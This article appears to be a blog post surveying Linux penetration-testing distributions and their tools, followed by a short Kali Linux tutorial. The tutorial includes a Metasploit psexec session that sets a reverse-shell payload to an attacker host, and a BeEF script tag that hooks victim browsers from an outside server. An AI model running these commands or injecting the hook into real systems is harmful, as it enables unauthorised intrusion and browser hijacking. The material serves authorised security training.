Linux is probably the operating system most commonly used by security professionals, and also by hackers. It provides a wealth of vulnerability scanning and exploit tools, many of which are available free. The fact that Linux, and many of its security tools, are open source, makes it easy for beginners to get started with penetration testing at low cost.
Because these are the same tools used by attackers in many threat scenarios, they are very valuable for realistic penetration testing.
In this article:
Top Linux Tools for Penetration Testing
Kali Linux
A popular pentesting and exploit toolkit, which runs on Debian. Offers over 600 tools that support penetration testing, reverse engineering and data forensics. Kali Linux lets you easily customize existing tools or create your own custom tools.
A useful feature is a forensic mode you can enable from the boot menu, which disables network services and freezes the current state of the system, helping you identify vulnerabilities during penetration testing.
Kali’s primary penetration testing tools include:
- Nmap—scans ports and devices on a network, and carries out operating system fingerprinting. Can be used to identify vulnerabilities and perform an audit of a company network. Coded in C++, with extensions in Python, Perl and C.
- Nikto—a vulnerability scanner that detects insecure artifacts on a target machine, such as files, applications, configurations, and missing patches. c in Perl.
- Metasploit—provides many useful tools to detect, identify, and exploit security vulnerabilities. Metasploit can enumerate networks, assess security gaps, exploit known vulnerabilities and collect sensitive data without being detected by remote hosts.
BackBox
A penetration testing platform based on Ubuntu, with a strong open source community. It provides a repository of software that can be useful for pentesters, including latest versions of analysis tools, ethical hacking tools, and system utilities. Its user interface is based on the XFCE desktop.
BackBox’s primary penetration testing tools include:
- Wireshark—analyzes network protocols and traffic on a network, helps understand network problems and identify traffic indicating malicious activity.
- Tcpdump—CLI utility that records and performs deep inspection on network traffic.
- Sqlmap—automates detection of SQL injection vulnerabilities, and can be used to compromise databases on a target system.
Parrot Security OS
A Debian-based operating system that enables forensics research and penetration testing, based on the MATE desktop. Can run on 32-bit and 512MB (64-bit) RAM with a minimum of 256MB of RAM. A useful feature of Parrot is its anonymous mode, which automatically routes all traffic through TOR. Parrot also comes with encryption and automation tools.
Parrot’s primary penetration testing tools include:
- TOR—a distributed network that directs traffic through volunteer machines, hiding user location and network properties. It is commonly used by attackers, and very useful in penetration testing scenarios as well.
- Aircrack-ng—used to assess WiFi security and crack WiFi networks. Can capture traffic, replay attacks on WiFi equipment, create fake access points, and perform many other attacks including packet injection and WEP/WPA protocol cracking.
- OpenVAS—a vulnerability scanning tool, with a variety of plugins written in NASL. It provides tests both for authenticated and non-authenticated systems, at any level of the network stack.
BlackArch
A pentesting distribution based on Arch Linux. Comes with over 1900 tools for penetration testing and forensic analysis. It provides a live mode feature that enables security assessment of web applications via lightweight Linux desktops like Openbox, dwm, and Awesome.
BlackArch penetration testing tools include:
- CyberScan—a pentesting tool that is easy to use for beginners. Provides a clear view of open ports and exposed points on the network. Analyzes network traffic and can perform geolocation for IPs on the network, as well as identify unknown hosts.
- ZMap—can scan private networks and the entire Internet, covering all IPv4 addresses in less than an hour, to discover protocols, DNS properties, encryption and more.
Quick Kali Linux Penetration Testing Tutorial
Below we briefly cover the main steps in Kali Linux penetration testing. This tutorial shows how to perform penetration testing on a publically-available website. All the tools mentioned come as part of the Kali Linux distribution. Of course, there are many other tools and options for penetration testing within Kali Linux.
Warning: You should never perform penetration testing against a target except with permission from the website owner.
1. Find vulnerabilities with Vega
Vega includes a vulnerability scanner and proxy for traffic inspection. It has an easy to use graphical UI.
Open Vega, start a new scan, and type the target website URL. You can select which vulnerability assessment modules to use in your scan. When the scan finishes, you can see findings organized by severity, and drill down to see details of vulnerabilities found and remediation recommendations.
2. Find vulnerabilities with ZapProxy
ZapProxy, provided by the OWASP project, is another tool you can use to find vulnerabilities in a website.
Open ZapProxy, enter your website URL and perform a scan. ZapProxy is a crawler that investigates the selected URL and other URLs linked from it. When the scan is done, the Alerts panel shows issues discovered and their details.
3. Select the easiest and most severe vulnerabilities
Make a combined list of the vulnerabilities discovered by the two tools. Choose 2-3 vulnerabilities that are severe, and might be easy to exploit. These are the vulnerabilities you’ll exploit in the next stages of the tutorial.
4. Run an exploit with Metasploit
Start the Metasploit Console. Use the search command to find an exploit discovered in the previous steps. Use the following syntax to find exploits—substitute KEYWORD for a topic like Microsoft, SQL, Javascript.
msf > search name:{KEYWORD} type:exploit
When you find a relevant exploit, use the info command to learn more about the exploit module. Finally, set a configuration for the exploit and run it using the exploit command. See this example from the Kali Linux documentation, which opens a shell to a remote Windows XP system.
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf exploit(psexec) > set SMBPASS s3cr3t
SMBPASS => s3cr3t
msf exploit(psexec) > exploit
5. Run a browser exploit with BeEF
BeEF (Browser Exploitation Framework) lets you run exploits using client-side attack vectors. See instructions on how to install and run BeEF on Kali Linux.
Once BeEF is running in the background, open a browser, it will require authentication. The user and password is beef. You should see the console:
The way BeEF works is to inject a Javascript into a target page, and get the user to view it. The user’s browser is then “hooked”, and BeEF can provide information about the target, and allow you to run attack modules against it.
This is the Javascript code you can use to attack a target browser:
<script src = “http://192.168.1.101:3000/hook.js” type = “text/javascript”></script>
Once you successfully attack a browser, the BeEF Control Panel will show the browser in the Online Browsers panel. Click a browser to view more information on the target system and launch attack commands.
Conclusion
Linux is a widely used operating system, a favorite amongst IT teams, security experts, and black hat hackers. As an open source operating system, Linux provides great flexibility and enables users to customize the system to their needs. This is, perhaps, why many prefer using Linux-based penetration testing tools. These tools are also offered as open source, and some are continuously updated and maintained by an active community.
